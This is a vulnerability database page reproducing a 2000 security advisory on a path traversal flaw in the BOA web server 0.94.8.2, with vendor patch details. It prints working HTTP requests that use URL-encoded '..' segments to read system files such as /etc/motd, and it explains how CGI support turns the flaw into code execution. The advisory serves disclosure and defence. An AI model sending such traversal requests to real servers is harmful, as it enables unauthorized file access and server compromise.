Vulners
Lucene search
BOA Web Server 0.94.8.2 - Arbitrary File Access Vulnerability
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | EAServer <= 6.3.1 Multiple Vulnerabilities | 3 Jul 201300:00 | – | nessus |
| Boa Web Server Traversal Arbtirary File Access/Execution | 6 Oct 200000:00 | – | nessus |
 | CVE-2000-0920 | 22 Jan 200105:00 | – | cve |
 | CVE-2000-0920 | 22 Jan 200105:00 | – | cvelist |
 | EUVD-2000-0907 | 7 Oct 202500:30 | – | euvd |
 | CVE-2000-0920 | 19 Dec 200005:00 | – | nvd |
 | Boa file retrieval | 3 Nov 200500:00 | – | openvas |
| Boa Web Server File Disclosure Vulnerability (Oct 2000) - Active Check | 3 Nov 200500:00 | – | openvas |
 | Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass | 17 Sep 200700:00 | – | securityvulns |
###############################################################
Title: Vulnerability in BOA web server v0.94.8.2
Date: 03/10/2000
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Author: llmora
Release: Public
###############################################################
S 2 1 S E C
http://www.s21sec.com
Vulnerability in BOA web server v0.94.8.2
There is a security bug in BOA v0.94.8.2 that allows a malicious
user to access files outside the document root of the web server
as the user the server runs as.
About BOA
---------
Boa is an open source high performance web server for Unix-alike
computers (http://www.boa.org). It does file serving and dynamic
content generation via CGI.
Vulnerability description
-------------------------
- Reading any file in the web server
The boa web server suffers of the well-known "../.." web server
problem. If we request a document from the web server,
using the "../.." technique, we get:
homer:~$ telnet ilf 80
Escape character is '^]'.
GET /../../../../../../../../../../../etc/motd HTTP/1.0
HTTP/1.0 404 Not Found
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL /etc/motd was not found on this server.
</BODY></HTML>
Connection closed by foreign host.
homer:~$
So apparently it doesn't work, as boa checks for "/.." in the path.
By URL-encoding the "." in the request, we are able to skip the ".." test,
allowing us to access the contents of any file the user running the
web server has access to:
homer:~$ telnet ilf 80
GET
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2
E/etc/motd HTTP/1.0
HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$
If the administrator enables extension based CGI support with a line like
this in the boa.conf file:
AddType application/x-httpd-cgi cgi
then a request for a file ending in .cgi will result in the file being
executed with the privileges of the user id running the web server. This
file can be placed in any folder throughout the file system, not strictly
under the DocumentRoot, and be accessed using the previous bug, leading
to the web server account compromise.
Affected versions
-----------------
This bug has been tested and verified to be present in v0.94.8.2 of the boa
web server. Version 0.92 of boa is not affected by this problem.
Fix information
---------------
The boa development team has released v0.94.8.3 which fixes this
vulnerability.
Upgrades are available at the vendor website (http://www.boa.org).
# 0day.today [2018-04-11] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2015 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.06558